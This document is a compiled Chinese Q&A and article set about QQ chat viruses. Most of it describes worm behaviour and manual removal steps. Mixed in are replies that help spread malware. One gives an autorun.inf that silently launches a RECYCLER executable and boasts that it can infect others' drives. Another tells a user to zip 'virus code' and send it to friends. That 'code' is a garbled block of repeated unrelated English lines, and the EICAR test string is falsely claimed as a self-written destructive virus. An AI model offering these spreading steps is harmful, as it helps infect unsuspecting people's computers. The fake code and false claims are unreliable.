QQ中病毒了,我该怎么办啊?
最近出现不少QQ尾巴病毒,虽然种类不同,但是本质是一样的,下面我就其中的一种做一下清除介绍。该病毒主要是向正在聊天的QQ用户发送类似“给你看看一个美女的照片.exe,这个软件对你QQ挂级肯定有用.exe”的消息,收到消息的QQ用户如果点击打开此文件的话,就会中毒,然后继续向其它正在聊天的QQ好友发送类似信息。该病毒每隔几分钟就会发送一次病毒消息,严重干扰了用户正常的信息传递。该病毒运行时会将用户的注册表锁定,同时销定任务管理器等,并且会修改注册表进行自启动,病毒驻留内存时会隐藏在其它进程里面,即使通过任务管理器工具也很难找到它。
首先我做了一个测试,打算中毒亲自体验一下杀毒详细过程,可惜我忘了关闭瑞星杀毒软件,我使用的是17.34.42版本。一接收立即杀掉,这说明这类病毒早已被杀。
没有办法,只好通过QQ的远程协助来进入朋友电脑查看原因,果然不出所料,注册表被锁,任务管理员被锁。哈哈,一看,我的朋友更厉害,电脑上好干净,杀毒软件没装,防火墙没有(可能使用XP防火墙吧),难怪他那么容易中毒了,好吧,我先帮他安装一个最新版的杀毒软件试一下,果然,一安装完就检测到有病毒,估计是他QQ开着的原因吧,马上就杀掉一个病毒,当时没有截图,具体名字不记得了。好吧,我们继续把其它的工作干完。
先恢复注册表吧,解锁注册表有好几类方法,一类就是写一个注册表文件导入进去解锁,文件内容大至如下(将以下代码复制到记事本,然后保存为REG文件,运行即可):
REGEDIT
[HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\policies]
"disableregistrytools"=dword:0
第一行也可以是“Windows Registry Editor Version 5.00”,这样只有windows200/xp环境下才能用,另外,dword必须小写
但是搞一下没有成功,没办法,我突然想起有另一种方法可以实现,使用用户策略来实现,估计很少有人使用这个吧^_^,看我操作,方法如下:
在Windows 2000/XP/2003中,我们可以通过单击“开始→运行”,输入“Gpedit.msc”后回车,打开“组策略”。然后依次展开“用户配置→管理模板→系统”,双击右侧窗口中的“阻止访问注册表编辑工具”,在弹出的窗口中选择“已禁用”,“确定”后再退出“组策略”,即可为注册表解锁。
好了,下面我们该恢复任务管理器了,本来在注册表中也可以修改的,可是找来找去找不到那个键值,大家可以试一下,具体方法为将HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DisableTaskmgr的值改为00000000即可
可是我搞来搞去不成功,没办法,拿出我的绝门武器,策略吧。。。。
在组策略中可以解决,方法,,开始-》运行中输入:gpedit.msc后回车。然后找到:管理模版-》系统-》登录\\注销中的禁用任务管理器一项,双击后选择已停用即可。
好了,到这儿我们算是把这个东东清理掉了,总之希望大家在上网聊天的时候一定要小心,不要被一些文字所迷惑,然后胡乱就中毒了自己还不知道,并且秧及鱼池。
给个病毒代码!顺便再告诉我怎么用!
[autorun]
open=.\RECYCLER\RECYCLER\autorun.exe
shell\1=Open
shell\1\Command=.\RECYCLER\RECYCLER\autorun.exe
shell\2\=Browser
shell\2\Command=.\RECYCLER\RECYCLER\autorun.exe
shellexecute=.\RECYCLER\RECYCLER\autorun.exe
将上写入记事本,命名为autorun.inf
就可,哈哈哈! 放心,自己电脑不会有问题的,这个自己可以随时删,传到别人里面嘛,只要他的杀毒不牛,可以感染他的硬盘哦
qq安全管家查出来两个病毒,又复制到了10个,在C/porgram data和user,$recycle.bin中
你好朋友,TR/Higacker.GEN和TR/Dopper.GE该病毒运行后会替换系统文件,然后会释放一个“梅勒斯病毒”,该病毒会关闭大量杀毒软件进程并创建注册表劫持项以躲避对其查杀。并根据黑客指定url下载大量病毒和木马。建议可以使用下360急救箱,下载,解压后,进入安全模式运行360系统急救箱自定义全盘扫描,查杀一遍,查杀完成后重启电脑。 然后再打开360系统急救箱,选择修复功能(修复选项可全选),立即修复,希望我的回答对你有帮助。
能否~~~将病毒代码的使用方法仔细教我?(包括怎么去发别人)
首先创建一个文本文档,然后把以下的所有代码复制进去,然后保存,在右击这个文件,添加到压缩文件。再发给你的朋友就行了,如果杀毒软件够好,绝对可以测出病毒,但是如果一般的杀毒软件,那么就.....哼哼哼哼!!!!电脑的运行速度就会越来越慢,但慢到一定程度病毒就自动消失了,但需要1个月---2个月左右,所以病毒显然比较弱,如果对方察觉到电脑开始慢了,可能会换杀毒软件,这样病毒就会被消灭掉
以下是病毒代码
EP TV University sets up a stone monument the selected location to solicit the opinion
EP TV University 51,literary performances
EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place (2006.11.04) EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place
map inquiry
weather forecast
traffic citation
electricity
the time arrangement and usually the work delivers the notice
EP the TV University "the May Day" has a vacation the notice which makes upmissed lesson
About automatically leaves school the notice which the student processes
About automatically leaves school
About automatically leaves school
Television
Train time inquiry
Commercial
EP TV University sets up a stone monument the selected location to solicit the opinion
EP TV University 51,literary performances
EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place (2006.11.04) EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place
map inquiry
weather forecast
traffic citation
electricity
the time arrangement and usually the work delivers the notice
EP the TV University "the May Day" has a vacation the notice which makes upmissed lesson
About automatically leaves school the notice which the student processes
About automatically leaves school
About automatically leaves school
Television
Train time inquiry
Commercial
EP TV University sets up a stone monument the selected location to solicit the opinion
EP TV University 51,literary performances
EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place (2006.11.04) EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place
map inquiry
weather forecast
traffic citation
electricity
the time arrangement and usually the work delivers the notice
EP the TV University "the May Day" has a vacation the notice which makes upmissed lesson
About automatically leaves school the notice which the student processes
About automatically leaves school
About automatically leaves school
Television
Train time inquiry
Commercial
EP TV University sets up a stone monument the selected location to solicit the opinion
EP TV University 51,literary performances
EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place (2006.11.04) EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place
map inquiry
weather forecast
traffic citation
electricity
the time arrangement and usually the work delivers the notice
EP the TV University "the May Day" has a vacation the notice which makes upmissed lesson
About automatically leaves school the notice which the student processes
About automatically leaves school
About automatically leaves school
Television
Train time inquiry
Commercial
EP TV University sets up a stone monument the selected location to solicit the opinion
EP TV University 51,literary performances
EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place (2006.11.04) EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place
map inquiry
weather forecast
traffic citation
electricity
the time arrangement and usually the work delivers the notice
EP the TV University "the May Day" has a vacation the notice which makes upmissed lesson
About automatically leaves school the notice which the student processes
About automatically leaves school
About automatically leaves school
Television
Train time inquiry
Commercial
EP TV University sets up a stone monument the selected location to solicit the opinion
EP TV University 51,literary performances
EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place (2006.11.04) EP the TV University holds the first session "the social dancing training class"
EP TV University net ALEXA place
map inquiry
weather forecast
traffic citation
electricity
the time arrangement and usually the work delivers the notice
EP the TV University "the May Day" has a vacation the notice which makes upmissed lesson
About automatically leaves school the notice which the student processes
About automatically leaves school
About automatically leaves school
Television
Train time inquiry
Commercial
第二中方法:同样创建个文本文档,将以下代码复制进去,再保存,此病毒稍微比刚才的病毒代码强一点
以下是病毒代码(就几串字符就有破坏力了,牛吧?我编写的)
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
常见的QQ病毒有哪些
一.“ QQ尾巴”病毒
病毒主要特征:
这种病毒并不是利用QQ本身的漏洞 进行传播。它其实是在某个网站首页上嵌入了一段恶意代码,利用IE的iFrame系统漏洞自动运行恶意木马程序,从而达到侵入用户系统,进而借助QQ进行垃圾信息发送的目的。用户系统如果没安装漏洞补丁或没把IE升级到最高版本,那么访问这些网站的时候其访问的网页中嵌入的恶意代码即被运行,就会紧接着通过IE的漏洞运行一个木马程序进驻用户机器。然后在用户使用QQ向好友发送信息的时候,该木马程序会自动在发送的消息末尾插入一段广告词,通常都是以下几句中的一种。
QQ收到信息如下:
1. HoHo~~ http://www.mm**.com刚才朋友给我发来的这个东东。你不看看就后悔哦,嘿嘿。也给你的朋友吧。
2. 呵呵,其实我觉得这个网站真的不错,你看看http://www.ktv***.com/
3. 想不想来点摇滚粗口舞曲,中华 DJ 第一站,网址告诉你http://www.qq33**.com.。不要告诉别人 ~ 哈哈,真正算得上是国内最棒的 DJ 站点。
4. http//www.hao***.com 帮忙看看这个网站打不打的开。
清除方法:
1.在运行中输入MSconfig,如果启动项中有“Sendmess.exe”和“wwwo.exe”这两个选项,将其禁止。在C:\WINDOWS一个叫qq32.INI的文件,文件里面是附在QQ后的那几句广告词,将其删除。转到DOS下再将“Sendmess.exe”和“wwwo.exe”这两个文件删除。
2.安装系统漏洞补丁
由病毒的播方式我们知道,“QQ尾巴”这种木马病毒是利用IE的iFrame传播的,即使不执行病毒文件,病毒依然可以借由漏洞自动执行,达到感染的目的。因此应该敢快下载IE的iFrame漏洞补丁。
二. QQ“缘”病毒
病毒特征:
该病毒用VB语言编写,采用ASPack压缩,利用QQ消息传播。运行后会将IE默认首页改变为:http://www.**115.COM/,如果你发现自己的IE首页被修改成以上网址,就是被该病毒感染了。
病毒会利用QQ发送例如“今天在网上下了本电子书,书名叫《缘》,写得不错,而且书的作者的名字很巧…………点击下面这个地址可以下载这本书”;“1937年12月13日,300000南京人民被侵华日军集体大屠杀!!!所有的中国人都不应忘记这个日子,从始至终日本人都没有改变它们的野心!中华儿女要团结自强牢记历史,我们要时刻警惕日本人的野心,钓鱼岛是中国的领土!!!台湾是中国不可分割的一部份!!!请你将此消息发给你QQ上的好友!”等消息,消息里的链接是病毒网址。
清除方法:
使用了下面的办法将其彻底删除。
找到下列文件:
C:\windows\system\noteped.exe
C:\windows\system\Taskmgr.exe
C:\Windows\noteped.exe
C:\Windwos\system32\noteped.exe
删除掉:其中Taskmgr.exe 要先打开"window 任务管理器",选中进程"Taskmgr.exe",杀掉
注意:有两个名字叫"Taskmgr.exe"进程,一个是QQ病毒,一个是你刚才打开的"Window 认为管理器"然后到注册表中找到"\HKey_Local_Machine\software\Microsoft\windows\CurrentVersion\Run"找到"Taskmgr" 删除
如果你还不明白那请你先找到那几个文件,然后再按下面步骤操作:
1.在任务栏上点击鼠标右键,选择任务管理器
2.选择进程里的Taskmgr.exe,但我后来又测试也进行名称不一定是大写的,也有可能是小写,一般排在上面的一个是。
3.点击开始-运行,输入Regedit进入注册表
4.在注册表中找到 "\HKey_Local_Machine\software\Microsoft\windows\CurrentVersion\Run,将Taskmgr"项删除"。
删除后重启计算机,《缘》QQ病毒宣布彻底删除。
另外提醒大家,尽快更新你的IE到IE6 SP1(立即下载) 这样可以减少很多的IE被改机会。
三、“QQ狩猎者”病毒
病毒特征:
1、在进行QQ聊天时会在消息中加入信息"向你介绍一个好看的动画网: http://flash2.533.net "
2、当浏览带毒网站时,会利用IE漏洞,尝试新增sys文件和tmp文件的执行关联,并下载执行病毒文件 b.sys,如果IE已经打上补丁,则会弹出一个插件对话框,引诱用户安装,安装后会将自己安装到 %Windows%Downloaded Program Files 文件夹中,文件名为"b.exe",如果用户拒绝安装该插件,会不断弹出对话框要求用户安装。
3、复制文件:
A、复制病毒体到 %SystemRoot% 文件夹中,文件名为"Rundll32.exe";
B、复制病毒体为 "C:\cmd.exe";
C、试图复制病毒体到共享目录中,名为"病毒专杀.exe"和"周杰伦演唱会.exe"。
4、添加注册表启动项,以随机启动在注册表的主键:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run添加以下键值"LoadPowerProfile"="%SystemRoot%Rundll32.exe"
5、修改和新增以下文件关联
A、修改.exe文件的关联,每当执行exe文件时,即首先执行病毒预先复制的病毒文件。在注册表的主键:HKEY_CLASS_ROOT\exefile\shell\open\command 修改如下键值:默认="C;\cmd.exe %1 *"
B、新增.sys文件的执行关联,使得在浏览带毒网站时执行病毒文件 b.sys在注册表的主键: HKEY_CLASS_ROOT\sysfile\shell\open\command修改如下键值:默认="""%1"" %*"
C、新增.tmp文件的执行关联在注册表的主键:HKEY_CLASS_ROOT\tmpfile\shell\open\command修改如下键值:默认="""%1"" %*"
6、试图偷传奇游戏的密码,并通过自带的邮件引擎以"mj25257758@263.sina.com"的名义发送到"scmsmj@tom.com"信箱中。
7、在Win2000、WinXP、Win2003系统中,系统文件"Rundll32.exe"就在系统目录中,因而病毒会尝试将该文件覆盖,但这几个系统都能自动保护并恢复受到破坏的系统文件,因而病毒不能正常加载,但仍可以通过EXE关联被加载.
清除方法:
A、关闭Windows Me、Windows XP、Windows 2003的“系统还原”功能;
B、重新启动到安全模式下;
C、先将regedit.exe改名为regedit.com,再用资源管理器结束cmd.exe进程,然后运行regedit.com,将EXE关联修改为""%1" %*",再删除以下文件:C:\cmd.exe、%Windows%\Download Program Files\b.exe。对于Win9x系统,还要删除%SystemRoot%\Rundll32.exe,再到共享目录中看有没有"病毒专杀.exe"和"周杰伦演唱会.exe"这两个文件,文件大小为11184字节,如果有,将其删除。
D、清理注册表:
打开注册表,删除主键 HKEY_CLASSES_ROOT\sysfile\shell\open、HKEY_CLASSES_ROOT\tmpfile\shell\open 修改 HKEY_CLASSES_ROOT\exefile\shell\open\command 的键值为 "%1" %*
防范措施:
不要轻易点击QQ上的不明链接,不要安装来历不明的插件(如该病毒网站上所谓的"动画播放插件2.0")。
四、“武汉男生”病毒
病毒特性:
此病毒是“武汉男生”的一系列新变种,病毒发作后会利用QQ聊天工具进行传播,定时给QQ网友发送包含网址的信息来诱使用户点击,该网页利用了IE的Object Data漏洞下载并运行病毒本身,该漏洞是由HTML中OBJECT的DATA标签引起的。对于DATA所标记的URL,IE会根据服务器返回的HTTP头来处理数据。如果HTTP头中返回的URL类型Content-Type是Application/hta,那么该URL指定的文件就能够执行,无论IE设置的安全级别有多高。
该变种较明显的特点是,病毒运行后,除定时发给QQ网友同样的网址外还会趁机盗取“传奇”游戏的帐户、密码以及其他信息,并以邮件形式发给盗密码者,还会结束多种反病毒软件,以保护自身不被清除。
(1)如果点击病毒网页,将会显示美女图片,而同时弹出一个标题为“asp空间”的不可见窗口。此网页利用IE漏洞,下载并运行leoexe.gif和leo.asp文件,其中leoexe.gif并不是图像文件,而是exe类型的病毒体,leo.asp是病毒释放器;
(2)病毒一旦运行,将结束大部分杀毒软件、防火墙以及某些病毒专杀工具;
(3)每隔一段时间给QQ网友发送信息
(4)病毒运行后会复制自身到系统目录下,文件名是updater.exe、Systary.exe、sysnot.exe,并在注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices中添加:
“windows update” = “%安装目录%\system\updater.exe” %安装目录% 是Windows 系统的安装目录,在不同系统下该目标表现可能不同,可能的有:c:\windows;c:\winnt 等。
(5)修改文本文件(*.txt)关联和可执行文件关联,直接指向病毒本身,如果用户运行任意的txt文件和exe文件都会激活病毒。
(6)病毒会在计算机中搜索传奇游戏的帐户、密码以及其他信息,发送到指定的E-Mail信箱。
清除病毒
1、删除病毒在系统目录下释放的病毒文件
2、删除病毒在注册表下生成的键值
3、运行杀毒软件,对病毒进行全面清除
五、“爱情森林”病毒
(一)病毒特征
该木马程序原始文件名为hack.exe,用Delphi编写,并用UPX进行了压缩。木马程序被运行后会:
1、复制自身到Windows操作系统的system目录(通常为windowssystem)下,并改名为Explorer.exe。由于它和Windows目录下的Explorer文件同名,因此会迷惑用户,使用户误认为这是一个正常的系统文件。
2、修改注册表,在HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun下添加键值Explorer="%windowssystem%Explorer.exe",使木马程序可以在开机后自动运行。(其中%windowssystem%为Windows的系统目录)
3、该木马程序还会在站点http://orchid.diy.163.com/下载文件update.exe,
并执行下载下来的程序,进行其它的破坏活动。
清除方法
(1)先打开任务管理器,结束掉位于下面的那个Explorer进程,然后删除系统目录下的木马程序Explorer.exe。或者重新启动到DOS下到system目录直接删除该木马程序。
(2)打开注册表编辑器,删除HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun下名为Explorer的键值。
(二)变种一病毒特征
该病毒运行后会:
1、复制两个自己的拷贝到Windows的系统目录(Win9x通常为Windowssystem,WinNt通常为WinNtsystem32)下,并分别更名为rundll.exe和sysedit32.exe。
2、修改注册表,在HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun下添加键值intarnet="%windowssystem%rundll.exe",使木马程序在开机后自动运行(其中%windowssystem%为Windows的系统目录)。
3、修改注册表,修改HKEY_CLASSES_ROOTtxtfileshellopencommand的默认键值为%windowssystem%sysedit32.exe,关联记事本,使用户打开txt文件时木马程序能获得运行机会。
4、该木马会通过QQ程序向其它的QQ用户发送“http://sckiss.yeah.net,你快去看看”
的消息,诱导用户浏览含有恶意代码的网页。
5、该木马还会尝试盗取QQ用户的密码并将其发送至指定的邮箱。有趣的是,由于病毒作者使用了一个组件来发送邮件,因此当木马程序执行发送邮件的操作时,该组件可能会弹出两个对话框,其中一个的内容为“220 welcom to coremail system(With Anti-Spam) 2.1”,另外一个对话框为“Cannot open file .mima.txt”。
清除方法
(1)打开任务管理器,结束掉RUNDLL和SYSEDIT32进程。
(2)删除系统文件夹(Win9x通常为Windowssystem,WinNt通常为WinNtsystem32)下名为RUNDLL.exe和sysedit32.exe的文件(文件大小为1781752字节)。
(3)打开注册表编辑器,删除HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun下名为intarnet=%windowssystem%rundll.exe\"的键值。恢复HKEY_CLASSES_ROOTtxtfileshellopencommand的默认键值为Notepad %1。(其中%windowssystem%为Windows的系统文件夹)
(4)若根目录下存在文件setup.txt或mima.txt,将其删除。
(三)变种二病毒特征
该木马程序被包装在一个名为s.eml的邮件中,并且利用了Iframe漏洞。当没有打补丁的用户浏览含有该邮件的网页时,邮件中的木马程序(Hack.exe)就会自动运行。
木马程序被运行后会:
1、复制自身到Windows系统目录(通常为windowssystem)下,改名为Explorer.exe。由于它和Windows目录下的Explorer文件同名,因此会使用户误认为这是一个正常的系统文件。
2、修改注册表,在HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun下添加键值Intarnet="%windowssystem%Explorer.exe",使木马程序可以在开机后自动运行。(其中%windowssystem%为Windows的系统目录)
3、该木马程序会通过QQ的“发送消息”窗口给QQ用户的网友发送如下信息“http://ajim.delphibbs.com去看看,很好看的”,
当用户点击该网址浏览时,木马程序就会被再次激活,从而使该木马通过QQ聊天工具不断地传播自己。
清除方法:
(1)打开任务管理器,结束掉位于下面的那个Explorer进程,然后删除系统目录下的木马程序Explorer.exe。或者重新启动到DOS下到system目录直接删除该木马程序。
(2)打开注册表编辑器,删除HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun下名为Explorer的键值。
(四)变种三病毒特征
该病毒运行后会:
1、复制两个自己的拷贝到Windows的系统目录(Win9x通常为Windowssystem,WinNt通常为WinNtsystem32)下,并分别更名为rundll.exe和sysedit32.exe。
2、修改注册表,在HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun下添加键值intarnet="%windowssystem%rundll.exe",使木马程序在开机后自动运行(其中%windowssystem%为Windows的系统目录)。
3、修改注册表,修改HKEY_CLASSES_ROOTtxtfileshellopencommand的默认键值为%windowssystem%sysedit32.exe,关联记事本,使用户打开txt文件时木马程序能获得运行机会。
4、修改注册表,修改IE浏览器的默认页,开始页,起始页。
5、该木马会通过QQ程序向其它的QQ用户发送“http://ontimer.spedia.net,你快去看看”
的消息,诱导用户浏览含有恶意代码的网页。
6、该木马还会尝试盗取QQ用户的密码并将其发送至指定的邮箱。
清除方法:
(1)打开任务管理器,结束掉RUNDLL和SYSEDIT32进程。
(2)删除系统文件夹(Win9x通常为Windows\\system,WinNt通常为WinNt\\system32)下名为RUNDLL.exe和sysedit32.exe的文件(文件大小为1781752字节)。
(3)打开注册表编辑器,删除HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run下名为intarnet=%windowssystem%\\rundll.exe\"的键值。恢复HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command的默认键值为Notepad %1。(其中%windowssystem%为Windows的系统文件夹)
(4)恢复IE的设置。打开注册表编辑器,恢复HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page,HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL,HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\Local Page的设置为原来的内容。
(五)变种四病毒特征
该木马程序用Delphi编写,并用UPX进行了压缩,但该程序需要用户的机器上安装了Delphi的动态库才能运行。该程序具有同“爱情森林”的第一个版本相同的特征,因此极有可能是病毒作者对“爱情森林”的第一个版本重新编译后生成的。木马程序被运行后会:
1、复制自身到Windows操作系统的system目录(通常为windowssystem)下,并改名为Explorer.exe。由于它和Windows目录下的Explorer文件同名,因此会迷惑用户,使用户误认为这是一个正常的系统文件。
2、修改注册表,在HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun下添加键值Explorer="%windowssystem%Explorer.exe",使木马程序可以在开机后自动运行。(其中%windowssystem%为Windows的系统目录)
3、该木马程序还会在站点http://orchid.diy.163.com/下载文件update.exe,
并执行下载下来的程序,进行其它的破坏活动。
清除方法
(1)先打开任务管理器,结束掉位于下面的那个Explorer进程,然后删除系统目录下的木马程序Explorer.exe。或者重新启动到DOS下到system目录直接删除该木马程序。
(2)打开注册表编辑器,删除HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run下名为Explorer的键值
六、“QQ女友”病毒
病毒特征:
利用QQ发送诱惑信息,导致用户上当。病毒发送一些诱惑新的文字和链接给在线的好友,致使不明真相的用户上当。
1.复制自己到系统目录:
%SYSDIR%\internet.exe
%SYSDIR%\svch0st.exe
2.修改如下注册表键值病毒自启动的伎俩:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"Network Associates, Inc." = "INTERNET.EXE"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"S0undMan" = "%SYSDIR%\SVCH0ST.EXE"
3.病毒运行后将建立一个HTTP服务器,监听TCP端口20808
该功能将响应远程的下载请求,将本地的病毒文件复制到远程机器。
4.病毒搜索QQ聊天软件,向在线的好友发送诱惑信息,内容如下:
“你是那样地美,美得象一首抒情诗。你全身充溢着少女的纯情和青春的风采。
留给我印象最深的是你那双湖水般清澈的眸子,以及长长的、一闪一闪的睫毛。
像是探询,像是关切,像是问候……………………
这是你需要的东西:
下载地址1
http://*.*.*.*::20808//%DRIVE%c:\\filename.exe
下载地址2
http://*.*.*.*::20808//%DRIVE%c:\\filename.exe”
其中*.*.*.*为本机地址,%filename%为下列之一:
"c:\setup.exe"
"c:\hello.exe"
"c:\flash.com"
"c:\123456.exe"
"c:\pass.exe"
"c:\game.exe"
"c:\my_photo.exe"
"c:\update.exe"
"c:\mp3.exe"
"c:\666666.exe"
这些都是病毒本身。
5.鉴于该病毒的特殊性,尤其是女性的使用QQ的用户,请看到上述信息时请不要上当。
清除方法
(1)打开任务管理器查看是否存在进程名为: INTERNET.EXE或SVCH0ST.EXE,终止它
(2)打开注册表编辑器,删除如下键值如果存在的话:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"Network Associates, Inc." = "INTERNET.EXE"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"S0undMan" = "%SYSDIR%\SVCH0ST.EXE"
(3)将%WINSYS%目录下的文件: SVCH0ST.EXE和SVCH0ST.EXE删除
注:%WINSYS%位Windows系统的安装目录,在win9x,winme,winxp下默认为:C:\WINDOWS\SYSTEM,win2k下默认为:C:\WINNT\SYSTEM32。
QQ中病毒了怎么办?
建议下载安装QQ病毒专杀软件:
1. QQ病毒专杀工具XP QQKav 2005 七夕版
QQKAV2005七夕版新增:屏蔽QQ尾巴消息(防止误入QQ尾巴病毒网站)、屏蔽好友发送的病
www.onlinedown.net/soft/20919.htm
2. QQ病毒专杀工具XP QQKav 2005 七夕版
QQKAV 2005 七夕版新增: 屏蔽QQ尾巴消息(防止误
www.skycn.com/soft/14305.html
3. 瑞星“QQ病毒”专杀工具 3.6
增加了QQMsender病毒变种:Trojan.QQMsender.Linmm专杀QQ病毒家族的专杀工具。下载工
www.onlinedown.net/soft/20603.htm
4. QQ病毒专杀工具XP QQKav 2005 七夕版
腾讯QQ自动发消息病毒专杀工具XP最新版。
dl.pconline.com.cn/html/1/3/dlid=11483dltypeid=1pn=0.html
5. QQ消息发送机病毒专杀工具 2003-09-23
QQ消息发送机病毒专杀工具。
dl.pconline.com.cn/html/1/9/dlid=10709dltypeid=1pn=0.html
6. 瑞星QQ病毒专杀工具 3.7
瑞星QQ病毒专用查杀工具。
dl.pconline.com.cn/html/¼/dlid=12344dltypeid=1pn=0.html
7. 腾讯QQ病毒专杀工具QQAV 2004 Build 1116
QQAV是由国内知名网络安全专家孤独剑客开发的一款专门
www.skycn.com/soft/13990.html
8. 腾讯QQ病毒专杀工具 QQAV5.0
据分析现在某些QQ发消息病毒开始内置偷窃QQ和游戏密码(传奇、奇迹等)功能,请速下载QQ
www.onlinedown.net/soft/19832.htm
升级 杀毒软件
进安全模式 杀。
杀毒的时候断开网络
或者下载 专杀工具。
清除工具:www.antion.microtwo.com/soft/setup.exe
相关资料:
VC写的发送QQ尾巴和盗取信息的木马病毒
一旦感染,病毒将执行下列操作:
复制到系统目录:
"%SYSDIR%\�.exe" -该文件的文件名为一个空格
"%SYSDIR%\notepad�.exe -该文件同样带有空格
"%SYSDIR%rundll32.exe
显示一个消息框,标题:“提示”,内容:
“安装时检测到系统中某程序与本软件发生冲突,请先纠正该冲突,或选择另一台电脑上安装!
病毒盗取QQ用户名、密码。
病毒发送QQ信息给在线好友。内容一般为:
好漂亮的动画哦,可以打开看看吧.exe
一个对你目前工作很有帮助的好东东.exe
你一定需要的工作资料(网上找到的).exe
接啊,快接啊,推荐给你看看.exe
QQTalk(QQ聊天秘籍,给你看看吧).exe
网上电视(20个CCTV频道+36个省台+50个英文台,极力推荐).exe
啊哈,网友发的超级搞笑FLASH,你看得懂吗.exe
笑死我了,你看过这个FLASH吗.exe
今年过年不收礼,收礼只收白骨精(搞笑版广告).exe
超级MM,超级FLASH,请你笑纳.exe
腾讯QQ特殊使用技巧之动画教程(对你一定很有用的).exe
网上听收音机(调到第5个频道,我们边聊边听吧).exe
在线收音机(我们一起听听第6个频道吧,来探讨这个话题).exe
看看我的高清晰视频图像,比QQ自带的强10倍.exe
你先看看我用静态照片制作成的MTV吧,我马上回来.exe
病毒运行后首先查找注册表中有无HKLM\Software\Classes\MSipv\MainVer值,如果有则不进行对系统的感染,如果没有该值,则建立HKLM\Software\Classes\MSipv项,然后尝试从以下注册表启动项位置:HKLM\Software\Microsoft\Windows\CurrentVersion\RunO
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesYnn{
HKCU\Software\Microsoft\Windows\CurrentVersion\RunWczi
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices7zkw
删除一些木马程序的启动项:
iexplorem1
IEXPLORE
mssysint
mspsint
mspbint
iexplore.exe
IEXPLORE .EXE
mssysint.exe
mspsint.exe
mspbint.exe
internat.exe
internat
同时尝试删除对应的木马程序文件。
病毒创建自身副本到系统目录下:
%System%\�.exe
%System%\notepad�.exe
%Windows%\System\RUNDLL32.EXE(如果是Windows 2000/XP)
%Windows%\System32\RUNDLL32.EXE(如果是Windows 9x)
并修改EXE和TXT的文件关联:
HKLM\Software\Classes\exefile\shell\open\command
EXE文件关联被修改为“� %1 %*”
HKLM\Software\Classes\txtfile\shell\open\command
TXT文件关联被修改为“notepad� %1”
注:其中“�”不是单纯的一个空格,而是一个字符。
再注:病毒文件大小不固定,从文件内容来看好像是通过一些重复的信息来改变文件大小。
此外,病毒还会检查被感染系统是否安装QQ,如果安装有QQ,病毒则通过注册表找到QQ.EXE所在路径,把正常的TIMPlatform.exe改名为TIMP1atform.exe,将病毒自身复制为TIMPlatform.exe
最后在注册表建立病毒标记:
HKLM\Software\Classes\MSipv\MainSetup
HKLM\Software\Classes\MSipv\MainUp
HKLM\Software\Classes\MSipv\MainVer
其中MainSetup和MainUp值相同,但不固定。
病毒的清除
由于病毒关联了EXE文件,我们建议这样处理:
首先打开注册表编辑器或用来恢复文件关联的工具(如RegFix),先不要关闭,然后通过任务管理器或ProceXP等进程管理工具结束病毒Rundll32.exe的进程,接下来恢复EXE和TXT文件关联,最后再找到病毒文件删除掉:
%System%\�.exe
%System%\notepad�.exe
%Windows%\System\RUNDLL32.EXE(如果是Windows 2000/XP)
%Windows%\System32\RUNDLL32.EXE(如果是Windows 9x)
还有一步,到QQ安装目录下,把病毒生成的TIMPlatform.exe删除,然后把TIMP1atform.exe改名为TIMPlatform.exe即可。
注:推荐使用工具来恢复TXT文件关联。
件名称:流行病毒专杀工具(Spant) 网址: http://www.spant.net/
最新版本:2004.02.19.1
软件类型:免费软件/反病毒工具
运行环境:Win98/Me/2K/XP
软件语言:简体中文
软件大小:143K
点击下载
软件简介:
Spant能有效查杀最新流行的QQ病毒、感染型病毒、蠕虫木马病毒等数百种,杀毒的同时还会自动修复被病毒和恶意网站破坏的注册表和IE等,使用方便,无需安装,会经常更新,新版的Spant会自动升级。
◆ Spant使用说明
使用Spant杀毒前一定要先关闭其它杀毒软件的病毒防火墙,也要关闭上网助手及兔子等工具的IE保护功能,对于某些病毒还要关闭所有打开的文件夹和IE窗口,否则会影响Spant查毒和修复IE。
◆ 关于IE主页修改的解决方案
